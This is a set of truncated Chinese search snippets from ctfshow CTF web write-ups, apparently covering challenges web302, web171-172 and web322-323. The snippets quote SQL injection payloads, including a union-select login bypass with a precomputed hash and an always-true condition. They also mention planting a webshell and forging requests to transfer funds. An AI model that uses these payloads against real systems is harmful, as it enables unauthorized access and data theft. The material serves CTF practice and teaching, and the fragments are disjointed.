ctfshowwwww 2.web302 查看这个函数 <?phpfunctionsds_decode($str){returnmd5(md5($str.md5(base64_encode("sds")))."sds"); }?> 需要进行 payload: 登录位置checklogin.php,1加密后就是下面的字段 userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'%23&userpwd=1 写木马 userid=a '...
web322-323 一个是get请求,一个是post请求,payload类似web331,主要是向admin那里转账到自己注册的新号,然后去买flag就行了,当然你们可以发现题目其实有个小漏洞,自己向自己转钱钱也还会越来越多 好吧考虑到大家水平我把这道题发个payload,两道题分别是get和post,我们知道jquery的这个ajax不能携带cookie请求,所以有...
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]} 1.payload2: make_payload("select * from ctfshow_flagasa;"){"code...
//拼接sql语句查找指定ID用户$sql="select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 无过滤的字符型注入。 payload:1'or'1'='1 滑到底找到flag。 web172 //拼接sql语句查找指定ID用户$sql="select username,password from ctfshow_user2 where ...
web302 修改处 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ fun.php: <?php function sds_decode($str){ return md5(md5($str.md5(base64_encode("sds")))."sds"); } ?> 在本地尝试一下:构造payload: userid=1'union select "d9c77c4e454869d5d8da3b4be79694d3"#&use...
Web安全 本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点... 南城夕雾 413620围观·8·242022-02-13 CTF中PHP相关题目考点总结(上)原创 Web安全 本文总结了ctfshow题目中遇到的关于PHP的考点。